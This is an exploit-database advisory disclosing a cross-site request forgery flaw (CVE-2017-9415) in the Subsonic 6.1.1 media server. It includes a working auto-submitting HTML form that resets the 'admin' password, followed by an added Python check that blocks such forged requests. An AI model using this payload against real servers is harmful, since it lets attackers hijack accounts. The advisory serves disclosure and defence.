1337DAY-ID-27890
Jun 05, 2017 - 12:00 a.m.

Subsonic 6.1.1 - Cross-Site Request Forgery Vulnerability

2017-06-05 00:00:00
hyp3rlinx
0day.today

EPSS: 0.001 (percentile: 48.2%)

Exploit for windows platform in category web applications

[+] Credits: John Page a.k.a hyp3rlinx  
 
 
Vendor:
================
www.subsonic.org
 
 
Product:
===============
Subsonic v6.1.1
 
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
 
 
 
Vulnerability Type:
=====================
CSRF - Password Reset
 
 
 
CVE Reference:
==============
CVE-2017-9415
 
 
 
Security Issue:
================
Remote attackers can reset Subsonic user account passwords if an authenticated user clicks a malicious link
or visits an attacker-controlled webpage. However, the username must be known or guessed.
 
 
 
 
Exploit/POC:
=============
<form  action="http://localhost:4040/userSettings.view" method="POST">
<input type="hidden" name="username"  value="admin">
<input type="hidden" name="transcodeSchemeName" value="OFF">
<input name="passwordChange" type="hidden" value="true"/>
<input type="hidden" name="_passwordChange" value="on"/>
<input  name="password" type="hidden" value="xyz123"/>
<input  name="confirmPassword" type="hidden" value="xyz123"/>
<input  name="email" type="hidden" value=""/>
<script>document.forms[0].submit()</script>
</form>
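
A server-side check that would reject the request above, as an added example (not code from the advisory or from Subsonic): the password-change POST is accepted only with a same-origin Origin/Referer header and a session-bound token. The `csrf_token` field name, `TRUSTED_ORIGINS`, the key handling and the sample requests are assumptions constructed for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: the origin the server is really served from (the PoC targets localhost:4040).
TRUSTED_ORIGINS = {"http://localhost:4040"}
SERVER_KEY = secrets.token_bytes(32)  # per-deployment secret, constructed for this example


def issue_token(session_id):
    """Token bound to the session; the genuine settings form carries it as a hidden field."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers):
    """Accept only requests whose Origin (or Referer as fallback) is our own origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed when the browser sends neither header
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" in TRUSTED_ORIGINS


def allow_password_change(method, headers, form, session_id):
    """Decide whether a request to /userSettings.view may change a password."""
    if method != "POST":
        return False, "state change must use POST"
    if not same_origin(headers):
        return False, "cross-origin request"
    sent = form.get("csrf_token", "")
    if not hmac.compare_digest(sent.encode(), issue_token(session_id).encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed requests: the advisory's form fields, then the same fields from the real form.
SESSION = "constructed-session-id"
POC_FORM = {"username": "admin", "transcodeSchemeName": "OFF",
            "passwordChange": "true", "_passwordChange": "on",
            "password": "xyz123", "confirmPassword": "xyz123", "email": ""}
FORGED = ("POST", {"Origin": "http://attacker.example"}, POC_FORM)
GENUINE = ("POST", {"Origin": "http://localhost:4040"},
           {**POC_FORM, "csrf_token": issue_token(SESSION)})

if __name__ == "__main__":
    for name, (method, headers, form) in {"forged": FORGED, "genuine": GENUINE}.items():
        print(name, allow_password_change(method, headers, form, SESSION))
```

Requiring the current password on the change form is a further control that a forged request cannot satisfy.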

#  0day.today [2018-01-10]  #
